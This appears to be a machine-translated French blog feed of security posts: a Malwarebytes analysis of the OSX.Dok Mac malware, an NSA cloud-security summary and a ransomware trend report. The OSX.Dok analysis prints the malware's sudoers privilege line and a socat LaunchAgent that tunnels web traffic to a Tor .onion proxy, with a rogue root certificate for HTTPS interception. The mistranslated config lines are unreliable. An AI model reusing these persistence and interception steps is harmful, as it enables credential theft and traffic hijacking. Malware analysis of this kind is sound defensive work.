En plus des attaques d'ingĂ©nierie sociale sur les Mac, la faille matĂ©rielle occasionnelle peut Ă©galement crĂ©er des vulnĂ©rabilitĂ©s, comme ce fut le cas avec les failles nommĂ©es Meltdown et Spectre que le journal The Guardian a signalĂ©es dĂ©but 2018. Apple a rĂ©pondu Ă ces failles de sĂ©curitĂ© en dĂ©veloppant des protections, mais a Ă©galement conseillĂ© Ă ses clients de tĂ©lĂ©charger les logiciels uniquement depuis des sources fiables, comme ses boutiques d'applications iOS et Mac, pour aider Ă empĂȘcher les pirates informatiques de pouvoir exploiter les vulnĂ©rabilitĂ©s du processeur.
Puis il y a eu l'insidieuse Calisto, une variante du malware Proton Mac, qui s'est dĂ©veloppĂ©e pendant deux ans avant d'ĂȘtre dĂ©couverte en juillet 2018. Elle Ă©tait dissimulĂ©e dans un faux programme d'installation de cybersĂ©curitĂ© Mac, et parmi d'autres fonctionnalitĂ©s, recueillait les noms d'utilisateur et les mots de passe.
Donc entre les virus, les malwares et les failles de sécurité, les pirates informatiques ont créé des kits d'outil complets pour semer la pagaille sur votre Mac, le plus récent étant celui dont l'équipe Malwarebytes Labs parle ici.
Prévention contre le piratage
Si votre ordinateur, votre tablette ou votre téléphone est en premiÚre ligne des attaques de pirates, alors protégez-le avec des cercles de précaution concentriques.
Pour commencer, tĂ©lĂ©chargez un produit anti-malware fiable (ou une application pour votre tĂ©lĂ©phone) qui peut Ă la fois dĂ©tecter et neutraliser les malwares et bloquer les connexions aux sites d'hameçonnage malveillants. Bien sĂ»r, que vous soyez sous Windows, Android ou Mac, sur un iPhone, ou sur un rĂ©seau dâentreprise, nous vous recommandons d'utiliser la protection multicouches de Malwarebytes for Windows, Malwarebytes for Android, Malwarebytes for Mac, Malwarebytes for iOS, et nos produits Malwarebytes pour les entreprises.
Le nouveau malware OSX.Dok intercepte le trafic Web
Publié par Thomas Reed
La plupart des logiciels malveillants sur Mac ont tendance Ă ĂȘtre peu sophistiquĂ©s. Bien qu'il prĂ©sente certains aspects plutĂŽt bruts et gĂȘnants, un nouveau logiciel malveillant pour Mac, baptisĂ© OSX.Dok, sort de ce moule typique.
OSX.Dok, dĂ©couvert par Check Point , utilise des moyens sophistiquĂ©s pour surveiller (et potentiellement modifier) ââtout le trafic HTTP et HTTPS vers et depuis le Mac infectĂ©. Cela signifie que le logiciel malveillant est capable, par exemple, de capturer les informations d'identification du compte de tout utilisateur du site Web auquel il se connecte, ce qui offre de nombreuses possibilitĂ©s de vol d'argent et de donnĂ©es.
De plus, OSX.Dok pourrait modifier les données envoyées et reçues dans le but de rediriger les utilisateurs vers des sites Web malveillants au lieu de sites légitimes.
MĂ©thode de distribution
OSX.Dok se présente sous la forme d'un fichier nommé Dokument.zip , qui est envoyé aux victimes dans des e-mails de phishing . Les victimes se trouvent principalement en Europe.
Si la victime tombe dans le piĂšge de l'arnaque, le fichier ZIP est dĂ©compressĂ© en un fichier nommĂ© « Document », qui (curieusement) a reçu la mĂȘme icĂŽne que les anciennes versions de l'application Aperçu d'Apple. Ce n'est pas la mĂȘme chose qu'une icĂŽne donnĂ©e Ă un document qui peut ĂȘtre ouvert par Aperçu.
 De plus, lâicĂŽne est Ă©trangement pixelisĂ©e, ce qui devrait dĂ©clencher des signaux dâalarme parmi les utilisateurs avertis.
Analyse comportementale
Ce « document » est bien entendu en réalité une application. Heureusement, lorsque l'utilisateur tente d'ouvrir cette application, macOS affichera une notification standard pour avertir l'utilisateur de ce fait :
Apple a dĂ©jĂ rĂ©voquĂ© le certificat utilisĂ© pour signer l'application. Ainsi, Ă ce stade, toute personne rencontrant ce malware ne pourra pas ouvrir l'application et ne pourra pas ĂȘtre infectĂ©e par celui-ci.
Si l'utilisateur clique au-delĂ de cet avertissement pour ouvrir l'application, celle-ci affichera un avertissement indiquant que le fichier n'a pas pu ĂȘtre ouvert, ce qui est simplement une couverture pour le fait qu'aucun document n'a Ă©tĂ© ouvert :
Il est intĂ©ressant de noter que cette fenĂȘtre ne peut pas ĂȘtre fermĂ©e car le bouton OK ne rĂ©pond pas. De plus, l'application restera bloquĂ©e dans ce mode pendant un certain temps. Si l'utilisateur devient mĂ©fiant Ă ce stade et tente de forcer la fermeture de l'application, celle-ci n'apparaĂźtra pas dans la fenĂȘtre Forcer Ă quitter les applications et dans le moniteur d'activitĂ©, elle apparaĂźtra sous le nom « AppStore ».
Si lâutilisateur parvient Ă forcer la fermeture de cette application « AppStore », tout ne va pas encore bien. Le compte-gouttes de malware se sera copiĂ© dans le dossier /Users/Shared/ et s'ajoutera aux Ă©lĂ©ments de connexion de l'utilisateur afin qu'il se rouvre Ă la prochaine connexion pour continuer le processus d'infection de la machine.
AprĂšs plusieurs minutes, l'application masquera tout l'Ă©cran avec une fausse notification de mise Ă jour.
Celui-ci restera obstinément à l'écran et reviendra au redémarrage puisque le malware se trouve dans les éléments de connexion de l'utilisateur. Si l'utilisateur clique sur le bouton Mettre à jour tout, le logiciel malveillant demandera un mot de passe administrateur.
Le malware restera dans ce mode pendant un certain temps, laissant l'ordinateur inutilisable pour l'utilisateur jusqu'Ă ce qu'il soit terminĂ©. Ceci est assez diffĂ©rent de tout processus normal de mise Ă jour de macOS et quiconque connaĂźt intimement macOS saura que quelque chose ne va pas, mais ceux qui ne le savent pas mieux pourraient facilement ĂȘtre trompĂ©s en pensant qu'il s'agit d'une procĂ©dure normale pour une mise Ă jour de sĂ©curitĂ© importante.
Une fois que l'utilisateur a fourni un mot de passe administrateur, le malware modifie le fichier /private/etc/sudoers , qui contrÎle l'accÚs à la commande sudo dans le shell Unix. Une ligne comme celle-ci est ajoutée à la fin du fichier sudoers :
test ALL=(TOUS) NOPASSWD: TOUS
Cette ligne prĂ©cise que l'utilisateur indiquĂ© â « test » dans ce cas â est autorisĂ© Ă utiliser sudo sans avoir besoin d'un mot de passe, garantissant ainsi que le logiciel malveillant peut continuer Ă disposer d'une autorisation au niveau racine sans continuer Ă demander un mot de passe administrateur.
En attendant, il y a une trÚs bonne raison à la longueur du temps d'installation : OSX.Dok sera occupé à utiliser ses privilÚges root mal acquis pour installer toutes sortes de logiciels en arriÚre-plan, y compris les outils de développement en ligne de commande macOS, qui sont nécessaires pour l'installation. d'autres outils qu'il installera.
Le malware installera Ă©galement Homebrew, un systĂšme d'installation en ligne de commande. Homebrew sera, Ă son tour, utilisĂ© pour tĂ©lĂ©charger et installer dâautres outils, notamment tor et socat. Le malware utilisera ces processus pour canaliser tout le trafic HTTP et HTTPS via un serveur proxy malveillant.
Deux fichiers seront installĂ©s dans le dossier LaunchAgents de l'utilisateur pour rediriger ce trafic. Le premier dâentre eux, nommĂ©Â Â com.apple.Safari.pac.plist , a le contenu suivant :
Rester en vie Ătiquette com.apple.Safari.pac Arguments du programme /usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.
0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:80,socksport=9050 Exécuter à la charge Chemin d'erreur standard /dev/null Chemin de sortie standard /dev/null Directeur de travail /usr/local
Le second, nommĂ©Â Â com.apple.Safari.proxy.plist , a le mĂȘme contenu, sauf qu'il utilise le port 5588 Ă la place des ports 5555 et 80.
En guise de coup de pied supplĂ©mentaire, OSX.Dok installe un nouveau certificat racine de confiance dans le systĂšme avec le nom « COMODO RSA Extended Validation Secure Server CA 2 ». GrĂące Ă ce certificat, il peut usurper lâidentitĂ© de nâimporte quel site Web de maniĂšre convaincante, dans le cadre du processus de falsification du trafic Web.
Une fois tout cela terminĂ©, le malware se supprime de /Users/Shared/ , laissant derriĂšre lui quelques signes Ă©vidents de sa prĂ©sence. Le dossier LaunchAgents est le seul changement susceptible d'ĂȘtre remarquĂ© par certains utilisateurs, et beaucoup ne comprendront pas que ces fichiers .plist ne sont pas rĂ©ellement associĂ©s Ă Apple.
Suppression
La suppression du logiciel malveillant peut ĂȘtre rĂ©alisĂ©e en supprimant simplement les deux fichiers LaunchAgents susmentionnĂ©s , mais il existe de nombreux restes et modifications du systĂšme qui ne peuvent pas ĂȘtre aussi facilement annulĂ©s. Les modifications apportĂ©es au fichier sudoers doivent ĂȘtre annulĂ©es et un utilisateur averti peut facilement le faire Ă l'aide d'un bon Ă©diteur de texte (comme BBEdit), mais apporter de mauvaises modifications Ă ce fichier peut entraĂźner de graves problĂšmes.
Un fichier  LaunchAgents nommĂ©Â homebrew.mxcl.tor.plist aura Ă©galement Ă©tĂ© installĂ©. Puisqu'il s'agit d'un fichier lĂ©gitime, il ne devrait pas ĂȘtre dĂ©tectĂ© comme malveillant, mais les personnes qui ne l'ont pas dĂ©jĂ installĂ© devraient le supprimer.
Le mauvais certificat doit ĂȘtre supprimĂ© du trousseau systĂšme Ă l'aide de l'application Trousseau Access (trouvĂ©e dans le dossier Utilitaires du dossier Applications.)
Les nombreux outils de ligne de commande lĂ©gitimes installĂ©s, constituĂ©s de dizaines de milliers de fichiers, ne peuvent pas ĂȘtre facilement supprimĂ©s.
Mise Ă jour : Certaines variantes ultĂ©rieures de Dok ont ââĂ©galement modifiĂ© le fichier /etc/hosts. Cela doit ĂȘtre restaurĂ© Ă partir d'une sauvegarde ou modifiĂ© manuellement pour le ramener Ă l'Ă©tat normal.
Consommateurs
Malwarebytes Anti-Malware pour Mac détectera les composants importants de ce malware comme OSX.Dok, désactivant ainsi l'infection active. Toutefois, en ce qui concerne les autres changements difficiles à inverser, qui introduisent des vulnérabilités et des changements potentiels de comportement, des mesures supplémentaires seront nécessaires. Pour les personnes qui ne connaissent pas le Terminal et les recoins obscurs du systÚme, il serait sage de demander l'aide d'un expert, ou d'effacer le disque dur et de restaurer le systÚme à partir d'une sauvegarde effectuée avant l'infection.
Entreprises
Lâimpact sur lâentreprise pourrait ĂȘtre bien plus grave, car cela pourrait exposer des informations susceptibles de permettre Ă un attaquant dâaccĂ©der aux ressources de lâentreprise. Par exemple, considĂ©rez les dommages potentiels si, pendant que vous ĂȘtes infectĂ©, vous visitez une page interne de lâentreprise qui fournit des instructions sur la façon de vous connecter au VPN de lâentreprise et dâaccĂ©der aux services internes de lâentreprise. Le malware aurait envoyĂ© toutes ces informations au serveur proxy malveillant.
Si vous avez Ă©tĂ© infectĂ© par ce malware dans un environnement professionnel, vous devez consulter votre service informatique afin qu'il puisse ĂȘtre conscient des risques et commencer Ă les attĂ©nuer.
0 notes
NSA publie les dix meilleures pratiques pour les environnements cloud
Les acteurs malveillants ciblent les environnements Cloud en raison de leur large acceptation et de leur stockage centralisé des informations importantes.
Lâexploitation des failles de la sĂ©curitĂ© du cloud peut permettre un accĂšs non autorisĂ© Ă des donnĂ©es sensibles, des interruptions de lâinfrastructure ou des revenus.
Le fait que les systÚmes soient hautement évolutifs et interconnectés en fait de bonnes cibles pour les cyberattaques.
Les analystes en cybersécurité de la NSA ont récemment publié les dix meilleures pratiques de sécurité pour les environnements cloud.
Dix meilleures pratiques pour les environnements cloud
Les chercheurs de la NSA ont rĂ©cemment publiĂ© des stratĂ©gies d'attĂ©nuation de la sĂ©curitĂ© du cloud dans le but de sensibiliser les utilisateurs du cloud aux pratiques de sĂ©curitĂ© importantes. Les acteurs malveillants ciblent principalement les utilisateurs du cloud lorsquâils transfĂšrent leurs donnĂ©es vers des environnements cloud.
Le document contient 10 fiches d'information sur la cybersécurité (CSI), chacune se concentrant sur une approche distincte.
Pour six des dix stratégies, la Cybersecurity and Infrastructure Security Agency (CISA) collabore avec la National Security Agency (NSA).
Ci-dessous, nous avons mentionné les dix meilleures pratiques de sécurité pour les environnements cloud fournies par la NSA : -
Respecter le modÚle de responsabilité partagée du cloud : ce CSI enseigne un cadre cloud en clarifiant les responsabilités de sécurité du CSP et des clients dans la sécurisation de l'instance cloud de leur choix.
Utiliser des pratiques sécurisées de gestion des identités et des accÚs dans le cloud (conjointement avec CISA) : ce CSI clarifie les menaces liées à la gestion des identités dans le cloud et suggÚre les meilleures pratiques pour les atténuer pour les organisations dans le cloud.
Utiliser des pratiques sĂ©curisĂ©es de gestion des clĂ©s dans le cloud (conjointement avec CISA) : ce CSI suggĂšre des options de gestion des clĂ©s et les meilleures pratiques pour leur utilisation. Il souligne lâimportance de comprendre les responsabilitĂ©s partagĂ©es en matiĂšre de sĂ©curitĂ© avec Cloud KMS.
Implémenter la segmentation et le chiffrement du réseau dans les environnements cloud (conjointement avec CISA) : ce CSI conseille sur l'application de principes dans les environnements cloud distincts des réseaux sur site. La technologie cloud offre une infrastructure pour ZT sans appareils spécialisés. Il met principalement en évidence les meilleures pratiques utilisant les fonctionnalités cloud communes.
Sécurisez les données dans le cloud (en collaboration avec CISA) : La sécurisation des données dans le cloud est cruciale à mesure que les organisations migrent. Comprendre la sensibilité des données, choisir un stockage approprié et appliquer des mesures de sécurité sont les facteurs clés. Ce CSI donne un aperçu et des pratiques de sécurisation et d'audit du stockage cloud.
Défendre les environnements d'intégration continue/de livraison continue (conjointement avec CISA) : la NSA et la CISA proposent ce CSI pour améliorer les défenses DevSecOps du cloud. Il guide l'intégration de la sécurité dans les environnements DevOps CI/CD, en tirant parti des directives gouvernementales pour des déploiements cloud CI/CD robustes.
Appliquez des pratiques de déploiement automatisées sécurisées grùce à une infrastructure telle que le code : IaC, lignes de base et images dorées, qui sont des modÚles pour déployer des ressources sur site et dans le cloud. IaC automatise le déploiement à l'aide de code, y compris les politiques de sécurité. Les lignes de base et les images dorées fournissent des points de départ sécurisés.
Tenir compte des complexitĂ©s introduites par les environnements cloud hybrides et multi-cloud : ce CSI aborde les dĂ©fis liĂ©s Ă la mise en Ćuvre des environnements hybrides et multi-cloud en proposant des solutions pour attĂ©nuer la complexitĂ© accrue.
NSA publie les dix meilleures pratiques
Atténuer les risques liés aux fournisseurs de services gérés dans les environnements cloud (en collaboration avec CISA) : les MSP gÚrent les services informatiques dans le cloud, offrant sauvegarde, infrastructure et sécurité. Ils proposent des solutions sur mesure, mais leur utilisation augmente les risques de cybersécurité.
GĂ©rez les journaux cloud pour une chasse efficace aux menaces : l'accĂšs des locataires cloud est complexe en raison de la virtualisation, car la sĂ©curitĂ© repose sur des journaux non modifiables. Ainsi, les politiques dâaccĂšs, les journaux et les audits doivent ĂȘtre surveillĂ©s. Les organisations doivent gĂ©rer les journaux pour la recherche des menaces et la conformitĂ©.
Le cloud computing améliore l'efficacité et la sécurité informatiques s'il est déployé correctement.
Cependant, la concentration des données attire les acteurs malveillants, ces lignes directrices leur permettront donc de protéger leur environnement cloud.
Avec la protection contre les logiciels malveillants Perimeter81, vous pouvez bloquer les logiciels malveillants, notamment les chevaux de Troie, les ransomwares, les logiciels espions, les rootkits, les vers et les exploits Zero Day. Tous sont incroyablement dangereux et peuvent faire des ravages sur votre réseau.
Restez informé des actualités sur la cybersécurité, des livres blancs et des infographies. Suivez-nous sur LinkedIn et Twitter.
L'article NSA publie les dix meilleures pratiques pour les environnements cloud apparaßt en premier sur GBHackers on Security | Plateforme d'information sur la cybersécurité n°1 mondialement fiable.
0 notes
La région Moyen-Orient et Afrique (MEA) a connu une recrudescence des attaques de ransomware-as-a-service (RaaS), qui constituent une grave menace pour la sécurité numérique.
Ce rapport complet examine les principales conclusions, les tendances des attaques, l'impact sur les entreprises et les mesures prĂ©ventives cruciales qui doivent ĂȘtre adoptĂ©es pour lutter contre cette cybermenace croissante.
Le parcours de transformation numĂ©rique de la rĂ©gion MEA, tout en ouvrant de nouvelles voies de croissance, lâa Ă©galement exposĂ©e Ă des cybermenaces sophistiquĂ©es.
Parmi celles-ci, les attaques de ransomwares sont apparues comme un formidable défi, avec une augmentation notable des incidents orchestrés via le modÚle RaaS.
Data Leaks in the Middle East & Africa
Fuites de données au Moyen-Orient et en Afrique
Ce phénomÚne met non seulement en danger la sécurité des données critiques, mais compromet également la stabilité économique des régions touchées.
Analyse technique
Les pays du Conseil de coopĂ©ration du Golfe (CCG), lâAfrique du Sud et la Turquie ont Ă©tĂ© identifiĂ©s comme des points chauds de ces cyberattaques.
Le rapport souligne également la prolifération des voleurs d'informations, avec plus de 1,2 million d'appareils infectés dans la MEA, soulignant la portée étendue des réseaux cybercriminels.
LockBit, BlackCat (ALPHV) et Arvin Club ont été identifiés comme les gangs de ransomwares les plus actifs de la région, LockBit représentant 38 % des attaques.
Attaques contre rançon
Une étude récente du Group-IB met en évidence une augmentation stupéfiante de 68 % des attaques de ransomwares dans la région MEA, les secteurs des services financiers et de l'immobilier étant les principales cibles.
Cette augmentation des incidents de ransomware est attribuĂ©e au modĂšle RaaS, qui a dĂ©mocratisĂ© l'accĂšs Ă des outils de cyberattaque sophistiquĂ©s, permettant mĂȘme aux criminels peu qualifiĂ©s de lancer des attaques dĂ©vastatrices.
Tendances des attaques
Le modĂšle RaaS a considĂ©rablement rĂ©duit les barriĂšres Ă lâentrĂ©e des cybercriminels, conduisant Ă une diversification des cibles et Ă une augmentation de la frĂ©quence des attaques.
Les secteurs des services financiers, de lâimmobilier et de lâindustrie manufacturiĂšre ont Ă©tĂ© les plus touchĂ©s par ces attaques, avec une augmentation notable des fuites de donnĂ©es et des rĂ©seaux dâentreprise compromis.
Lâimplication des Initial Access Brokers (IAB) dans la vente de lâaccĂšs Ă ces rĂ©seaux sur le dark web complique encore davantage le paysage des menaces, obligeant les entreprises Ă renforcer leurs dĂ©fenses en matiĂšre de cybersĂ©curitĂ©.
Vous pouvez bloquer les logiciels malveillants, notamment les chevaux de Troie, les ransomwares, les logiciels espions, les rootkits, les vers et les exploits du jour zéro, grùce à la protection contre les logiciels malveillants Perimeter81. Tous sont incroyablement dangereux, peuvent faire des ravages et endommager votre réseau.
1 note
·
View note